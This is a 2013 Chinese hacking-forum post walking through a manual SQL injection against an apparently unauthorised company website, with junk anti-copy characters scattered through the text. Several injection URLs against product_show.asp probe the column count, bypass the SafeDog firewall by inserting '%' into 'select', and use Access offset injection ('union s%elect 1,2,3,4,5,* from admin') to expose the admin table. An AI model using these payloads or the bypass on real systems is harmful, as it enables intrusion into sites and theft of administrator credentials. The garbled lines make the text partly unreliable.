找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2171|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
- M" p, h1 L: I/ s( G7 i
! Z" ?7 @  z$ f! n) i- P* `' a
0 b6 s2 E2 t2 H* B9 s顺手加个admin
" y6 v- {6 T  S; J7 O9 I/ r
5 y- [- V1 h8 l5 s9 ]9 }( ?9 v, `8 F3 ^
默认后台。
7 h& b0 L( o( ^! v回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
1 I- M8 h* D% J$ E
& p+ j' b) H3 u
! [' G- d9 V0 o% D
" ~2 }" u- f2 c3 s/ H7 s所以就不用御剑扫了,待会直接封IP。
4 A4 X( i7 ?" ?: n 9 S" u. g2 h" o& @( P' n  c
用order by语句判断是否存在注入。
  v" t) Y/ W% @) v3 Khttp://www.xxx.com /product_show.asp?id=997 order by 1
5 f1 ~, Y# o" N! _' ]http://www.xxx.com /product_show.asp?id=997 order by 1006 ]0 n2 o6 X) F' A. S7 b
现在存在注入,经测试后发现是9个字段。" j: [, O) T5 H
0 i, y" D' E3 U5 H, m0 A+ Y+ O6 K
接下来进行联合查询,猜是否存在admin表。
4 M! `, t" g& i' j1 \  @http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
  {1 y* |" W9 _9 X
" X6 `4 ?$ A# n5 {+ D! b# Y3 h: T. x5 s' ]; U; D

6 E. Z; m. _* t5 W+ N在select中间加个%,se%lect绕过安全狗。$ f7 c" Q+ n+ A9 P( W1 R

, N& \" t' `: P8 |+ t' ^& \. }
/ f2 n. H/ a$ F- y( q  m发现存在admin表,然后开始手工猜常用的字段。
8 x9 h9 b+ z% n: M/ J5 n纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
" F* e2 _3 D& J$ J
2 W; N! [$ I( |2 ~$ P4 {突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。  N6 p5 n4 u, u3 o$ [
3 }; z- [9 @# F7 c
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
! |4 P  t. O% ~  Shttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin8 j) w8 V& M. [% V6 Y8 D
好了,敏感内容出显了。​3 E( _2 w! M2 o. n* a

' L  z0 W7 E& U8 i  I* y* ^3 l( U) {1 l- I% B% ^8 y

' N) ^2 D' z  {# _- _0 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表